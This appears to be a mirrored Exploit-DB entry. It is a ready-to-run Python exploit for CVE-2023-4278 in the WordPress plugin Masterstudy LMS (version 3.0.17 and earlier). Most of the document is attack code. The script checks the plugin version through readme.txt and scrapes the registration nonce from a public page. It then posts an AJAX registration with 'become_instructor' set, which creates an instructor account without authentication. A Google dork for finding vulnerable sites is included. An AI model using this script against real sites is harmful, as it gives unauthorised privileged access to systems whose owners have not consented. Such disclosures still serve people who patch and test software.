WordPress Plugin Masterstudy LMS – 3.0.17 – Unauthenticated Instructor Account Creation

  • 作者: Revan Arifio
    日期: 2023-10-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51735/
  • # Exploit Title:WordPress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation
# Google Dork: inurl:/user-public-account
# Date: 2023-09-04
# Exploit Author: Revan Arifio
# Vendor Homepage: https:/.org/plugins/masterstudy-lms-learning-management-system/
# Version: <= 3.0.17
# Tested on: Windows, Linux
# CVE : CVE-2023-4278

import requests
import os
import re
import time

banner = """
 __________________ ___ _________ ___ ______ ___
/ ____\ \/ /____||__ \ / _ \__ \|___ \| || |__ \____/ _ \ 
 | | \ \/ /| |__ ______ ) | | | | ) | __) |_____| || |_ ) |/ / (_) |
 | |\ \/ / |__|______/ /| | | |/ / |__ <______|__ _/ // / > _ < 
 | |____ \/| |____/ /_| |_| / /_ ___) || |/ /_ / / | (_) |
\_____| \/ |______||____|\___/____|____/ |_|____/_/ \___/ 

======================================================================================================
|| Title: Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation ||
|| Author : https://github.com/revan-ar ||
|| Vendor Homepage: https:/wordpress.org/plugins/masterstudy-lms-learning-management-system/||
|| Support: https://www.buymeacoffee.com/revan.ar ||
======================================================================================================

"""


print(banner)

# get nonce
def get_nonce(target):
open_target = requests.get("{}/user-public-account".format(target))
search_nonce = re.search('"stm_lms_register":"(.*?)"', open_target.text)
if search_nonce[1] != None:
return search_nonce[1]
else:
print("Failed when getting Nonce :p")



# privielege escalation
def privesc(target, nonce, username, password, email):

req_data = {
"user_login":"{}".format(username),
"user_email":"{}".format(email),
"user_password":"{}".format(password),
"user_password_re":"{}".format(password),
"become_instructor":True,
"privacy_policy":True,
"degree":"",
"expertize":"",
"auditory":"",
"additional":[],
"additional_instructors":[],
"profile_default_fields_for_register":[],
"redirect_page":"{}/user-account/".format(target)
}

start = requests.post("{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json = req_data)

if start.status_code == 200:
print("[+] Exploit Success !!")
else:
print("[+] Exploit Failed :p")



# URL target
target = input("[+] URL Target: ")
print("[+] Starting Exploit")
plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target))
plugin_version = re.search("Stable tag: (.+)", plugin_check.text)
int_version = plugin_version[1].replace(".", "")
time.sleep(1)

if int(int_version) < 3018:
print("[+] Target is Vulnerable !!")
# Credential
email =input("[+] Email: ")
username =input("[+] Username: ")
password =input("[+] Password: ")
time.sleep(1)
print("[+] Getting Nonce...")
get_nonce = get_nonce(target)
# Get Nonce
if get_nonce != None:
print("[+] Success Getting Nonce: {}".format(get_nonce))
time.sleep(1)
# Start PrivEsc
privesc(target, get_nonce, username, password, email)
# ----------------------------------

else:
print("[+] Target is NOT Vulnerable :p")